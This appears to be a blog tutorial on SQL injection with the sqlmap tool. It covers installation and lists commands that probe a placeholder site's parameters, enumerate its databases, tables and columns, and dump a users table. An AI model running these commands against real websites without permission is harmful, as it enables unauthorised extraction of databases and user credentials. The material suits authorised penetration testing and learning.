SQL Injection Using Sqlmap

sqlmap

SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true. It takes advantage of the design flaws in poorly designed web applications to exploit SQL statements to execute malicious SQL code.

Sqlmap is one of the most popular and powerful sql injection automation tool out there. From confirming the SQL injection vulnerability to extracting the database name, tables, columns and gaining a full system, it can be used for multiple purposes.

Installation

  • Your system should have python installed since sqlmap is a python based tool.
  • Download sqlmap by cloning the Git repository
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
  • Go to the sqlmap directory.
cd sqlmap-dev
  • To get a full list of the options available, run
python sqlmap.py -h

Important SQLMap Commands

  • Test GET parameters
python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'
  • Test POST parameters
python sqlmap.py --data "param=val[&...]" -u "http://mytestsite.com/page"
  • Discover Databases
python sqlmap.py -u "http://mytestsite.com/section.php?id=51" --dbs
  • Find tables in a particular database
python sqlmap.py -u "http://mytestsite.com/section.php?id=51" --tables -D databasename
  • Get columns of a table
python sqlmap.py -u "http://mytestsite.com/section.php?id=51" --columns -D databasename -T users
  • Get data from a table
python sqlmap.py -u "http://www.mytestsite.com/section.php?id=51" --dump -D databasename -T users

Related Post

Leave a Reply

Your email address will not be published. Required fields are marked *